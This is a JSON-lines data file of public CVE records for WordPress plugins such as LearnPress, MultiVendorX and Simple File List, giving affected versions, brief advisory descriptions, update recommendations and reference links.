{"CVE_ID":"CVE-2023-6634","slug":"learnpress","versionImpact":"4.2.5.7","versionEndExcluding":"4.2.5.8","description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.","recommendation":"Update to version 4.2.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21291ed7-cdc0-4698-9ec4-8417160845ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21291ed7-cdc0-4698-9ec4-8417160845ed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6567","slug":"learnpress","versionImpact":"4.2.5.7","versionEndExcluding":"4.2.5.8","description":"The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order_by\u2019 parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.2.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ab578cd-3a0b-43d3-aaa7-0a01f431a4e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ab578cd-3a0b-43d3-aaa7-0a01f431a4e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013957\\\/learnpress\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5558","slug":"learnpress","versionEndExcluding":"4.2.5.4","description":"The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 4.2.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4efd2a4d-89bd-472f-ba5a-f9944fd4dd16\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4efd2a4d-89bd-472f-ba5a-f9944fd4dd16\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4148","slug":"oauth2-provider","versionEndExcluding":"4.2.5","description":"The WP OAuth Server (OAuth Authentication) WordPress plugin before 4.2.5 has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated users, such as subscriber to delete arbitrary client.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be9b25c8-b0d7-4c22-81ff-e41650a4ed41\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be9b25c8-b0d7-4c22-81ff-e41650a4ed41\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3894","slug":"oauth2-provider","versionEndExcluding":"4.2.5","description":"The WP OAuth Server (OAuth Authentication) WordPress plugin before 4.2.5 does not have CSRF check when deleting a client, and does not ensure that the object to be deleted is actually a client, which could allow attackers to make a logged in admin delete arbitrary client and post via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298487b2-4141-4c9f-9bb2-e1450aefc1a8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298487b2-4141-4c9f-9bb2-e1450aefc1a8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9943","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.4","versionEndExcluding":"4.2.5","description":"The MultiVendorX \u2013 The Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.4. This is due to missing or incorrect nonce validation on several functions in api\/class-mvx-rest-controller.php. This makes it possible for unauthenticated attackers to update vendor account details, create vendor accounts, and delete arbitrary users via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b950faf9-2122-42af-9f05-ec850767be32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b950faf9-2122-42af-9f05-ec850767be32?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L5258\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L5258\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L6155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L6155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L6009\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.1\\\/api\\\/class-mvx-rest-controller.php#L6009\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173238\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/api\\\/class-mvx-rest-controller.php?old=3168957&old_path=dc-woocommerce-multi-vendor%2Ftrunk%2Fapi%2Fclass-mvx-rest-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173238\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/api\\\/class-mvx-rest-controller.php?old=3168957&old_path=dc-woocommerce-multi-vendor%2Ftrunk%2Fapi%2Fclass-mvx-rest-controller.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9531","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.4","versionEndExcluding":"4.2.5","description":"The MultiVendorX \u2013 The Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mvx_sent_deactivation_request' function in all versions up to, and including, 4.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to send a canned email to the site's administrator asking to delete the profile of an arbitrary vendor.","recommendation":"Update to version 4.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5af1063c-615e-4196-9fa6-960c008544c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5af1063c-615e-4196-9fa6-960c008544c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php#L3780\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php#L3780\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173238\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php?contextall=1&old=3168957&old_path=%2Fdc-woocommerce-multi-vendor%2Ftrunk%2Fclasses%2Fclass-mvx-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173238\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php?contextall=1&old=3168957&old_path=%2Fdc-woocommerce-multi-vendor%2Ftrunk%2Fclasses%2Fclass-mvx-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12309","slug":"rate-my-post","versionImpact":"4.2.4","versionEndExcluding":"4.2.5","description":"The Rate My Post \u2013 Star Rating Plugin by FeedbackWP plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.4 via the get_post_status() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to vote on unpublished scheduled posts.","recommendation":"Update to version 4.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206801\\\/rate-my-post\\\/trunk\\\/public\\\/class-rate-my-post-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206801\\\/rate-my-post\\\/trunk\\\/public\\\/class-rate-my-post-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9aa467f-9ac2-4a84-b0bb-761101733af7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9aa467f-9ac2-4a84-b0bb-761101733af7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4199","slug":"ithemeland-bulk-posts-editing-lite","versionImpact":"4.2.3","versionEndExcluding":"4.2.4","description":"The Bulk Posts Editing For WordPress plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on the plugin's AJAX actions in all versions up to, and including, 4.2.3. This makes it possible for authenticated attackers, with subscriber access and higher, to invoke their corresponding functions. This may lead to post creation and duplication, post content retrieval, post taxonomy manipulation.","recommendation":"Update to version 4.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085134%40ithemeland-bulk-posts-editing-lite%2Ftrunk&old=2946926%40ithemeland-bulk-posts-editing-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085134%40ithemeland-bulk-posts-editing-lite%2Ftrunk&old=2946926%40ithemeland-bulk-posts-editing-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/683131a0-eec3-4251-b322-5c2088855687?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/683131a0-eec3-4251-b322-5c2088855687?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4204","slug":"ithemeland-bulk-posts-editing-lite","versionImpact":"4.2.3","versionEndExcluding":"4.2.4","description":"The Bulk Posts Editing For WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.3. This is due to missing or incorrect nonce validation on the plugin's AJAX actions. This makes it possible for unauthenticated attackers to create and duplicate posts, retrieve post content, and modify post taxonomy among other things via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34b39462-32c5-4f7d-b54f-d95f40b6ed92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34b39462-32c5-4f7d-b54f-d95f40b6ed92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085134%40ithemeland-bulk-posts-editing-lite%2Ftrunk&old=2946926%40ithemeland-bulk-posts-editing-lite%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085134%40ithemeland-bulk-posts-editing-lite%2Ftrunk&old=2946926%40ithemeland-bulk-posts-editing-lite%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5861","slug":"wp-easy-pay","versionImpact":"4.2.3","versionEndExcluding":"4.2.4","description":"The WP EasyPay \u2013 Square for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpep_square_disconnect() function in all versions up to, and including, 4.2.3. This makes it possible for unauthenticated attackers to disconnect Square.","recommendation":"Update to version 4.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/446d458e-8b42-434e-a190-0af37a7d3afb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/446d458e-8b42-434e-a190-0af37a7d3afb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-pay\\\/trunk\\\/modules\\\/payments\\\/square-authorization.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-pay\\\/trunk\\\/modules\\\/payments\\\/square-authorization.php#L199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3106655%40wp-easy-pay&new=3106655%40wp-easy-pay&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3106655%40wp-easy-pay&new=3106655%40wp-easy-pay&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3122946%40wp-easy-pay&new=3122946%40wp-easy-pay&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3122946%40wp-easy-pay&new=3122946%40wp-easy-pay&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6000","slug":"popup-builder","versionEndExcluding":"4.2.3","description":"The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cdb3a8bd-4ee0-4ce0-9029-0490273bcfc8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cdb3a8bd-4ee0-4ce0-9029-0490273bcfc8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/stored-xss-fixed-in-popup-builder-4-2-3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/stored-xss-fixed-in-popup-builder-4-2-3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36847","slug":"simple-file-list","versionEndExcluding":"4.2.3","description":"The Simple-File-List Plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 4.2.2 via the rename function which can be used to rename uploaded PHP code with a png extension to use a php extension. This allows unauthenticated attackers to execute code on the server.","recommendation":"Update to version 4.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/160221\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/160221\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2286920\\\/simple-file-list\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2286920\\\/simple-file-list\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/365da9c5-a8d0-45f6-863c-1b1926ffd574\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/365da9c5-a8d0-45f6-863c-1b1926ffd574\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2020042711\",\"name\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2020042711\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9eb835fd-6ebf-4162-856c-0366b663a07e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9eb835fd-6ebf-4162-856c-0366b663a07e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4101","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.22","versionEndExcluding":"4.2.23","description":"The MultiVendorX \u2013 WooCommerce Multivendor Marketplace Solutions plugin for WordPress is vulnerable to unauthorized loss of data due to a misconfigured capability check on the 'delete_fpm_product' function in all versions up to, and including, 4.2.22. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary posts, pages, attachments, and products. The vulnerability was partially patched in version 4.2.22.","recommendation":"Update to version 4.2.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php#L982\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php#L982\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293832\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php?old=3272848&old_path=dc-woocommerce-multi-vendor%2Ftrunk%2Fclasses%2Fclass-mvx-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293832\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php?old=3272848&old_path=dc-woocommerce-multi-vendor%2Ftrunk%2Fclasses%2Fclass-mvx-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c1fd517-32ee-429d-9026-512afe117dc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c1fd517-32ee-429d-9026-512afe117dc5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2789","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.19","versionEndExcluding":"4.2.20","description":"The MultiVendorX \u2013 Empower Your WooCommerce Store with a Dynamic Multivendor Marketplace \u2013 Build the Next Amazon, eBay, Etsy plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the delete_table_rate_shipping_row function in all versions up to, and including, 4.2.19. This makes it possible for unauthenticated attackers to delete Table Rates that can impact the shipping cost calculations.","recommendation":"Update to version 4.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.19\\\/packages\\\/mvx-tablerate\\\/mvx-tablerate.php#L211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.19\\\/packages\\\/mvx-tablerate\\\/mvx-tablerate.php#L211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.19\\\/packages\\\/mvx-tablerate\\\/mvx-tablerate.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.19\\\/packages\\\/mvx-tablerate\\\/mvx-tablerate.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf4eca37-066f-428c-a4f7-061ce06e1142?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf4eca37-066f-428c-a4f7-061ce06e1142?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3281","slug":"user-registration","versionImpact":"4.2.1","versionEndExcluding":"4.2.2","description":"The User Registration & Membership \u2013 Custom Registration Form, Login Form, and User Profile plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.1 via the create_stripe_subscription() function, due to missing validation on the 'member_id' user controlled key. This makes it possible for unauthenticated attackers to delete arbitrary user accounts that have registered through the plugin.","recommendation":"Update to version 4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.1.3\\\/modules\\\/membership\\\/includes\\\/AJAX.php#L619\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.1.3\\\/modules\\\/membership\\\/includes\\\/AJAX.php#L619\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3287698\\\/user-registration\\\/trunk\\\/modules\\\/membership\\\/includes\\\/AJAX.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3287698\\\/user-registration\\\/trunk\\\/modules\\\/membership\\\/includes\\\/AJAX.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30339ff6-b6bf-4c56-b6cd-db0b8a6ce8b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30339ff6-b6bf-4c56-b6cd-db0b8a6ce8b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11809","slug":"primer-mydata","versionImpact":"4.2.1","versionEndExcluding":"4.2.2","description":"The Primer MyData for Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'img_src' parameter in all versions up to, and including, 4.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3205727%40primer-mydata%2Ftrunk&old=3188823%40primer-mydata%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3205727%40primer-mydata%2Ftrunk&old=3188823%40primer-mydata%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aca092cf-9482-468e-8dd4-af04e25bcf33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aca092cf-9482-468e-8dd4-af04e25bcf33?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4630","slug":"astra-sites","versionImpact":"4.2.1","versionEndExcluding":"4.2.2","description":"The Starter Templates \u2014 Elementor, WordPress & Beaver Builder Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018custom_upload_mimes\u2019 function in versions up to, and including, 4.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25edb9e8-65ea-41d1-a95f-09be110ec1d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25edb9e8-65ea-41d1-a95f-09be110ec1d2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/astra-sites\\\/tags\\\/4.2.0\\\/inc\\\/importers\\\/wxr-importer\\\/class-astra-wxr-importer.php#L416\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/astra-sites\\\/tags\\\/4.2.0\\\/inc\\\/importers\\\/wxr-importer\\\/class-astra-wxr-importer.php#L416\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084334\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084334\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10437","slug":"wpc-smart-messages","versionImpact":"4.2.1","versionEndExcluding":"4.2.2","description":"The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to unauthorized Smart Message activation\/deactivation due to a missing capability check on the ajax_enable function in all versions up to, and including, 4.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate or deactivate smart messages.","recommendation":"Update to version 4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4acb4fda-0217-44b9-a85e-64807eb4a011?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4acb4fda-0217-44b9-a85e-64807eb4a011?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpc-smart-messages\\\/tags\\\/4.2.1\\\/includes\\\/class-backend.php#L775\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpc-smart-messages\\\/tags\\\/4.2.1\\\/includes\\\/class-backend.php#L775\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177426\\\/wpc-smart-messages\\\/trunk\\\/includes\\\/class-backend.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177426\\\/wpc-smart-messages\\\/trunk\\\/includes\\\/class-backend.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10891","slug":"save-as-pdf-by-pdfcrowd","versionImpact":"4.2.1","versionEndExcluding":"4.2.2","description":"The Save as PDF Plugin by Pdfcrowd plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'save_as_pdf_pdfcrowd' shortcode in all versions up to, and including, 4.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3763d893-83a0-4b6a-9c21-34a69313d555?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3763d893-83a0-4b6a-9c21-34a69313d555?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/save-as-pdf-by-pdfcrowd\\\/trunk\\\/public\\\/class-save-as-pdf-pdfcrowd-public.php#L586\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/save-as-pdf-by-pdfcrowd\\\/trunk\\\/public\\\/class-save-as-pdf-pdfcrowd-public.php#L586\",\"refsource\":\"\",\"tags\":[]}]"}
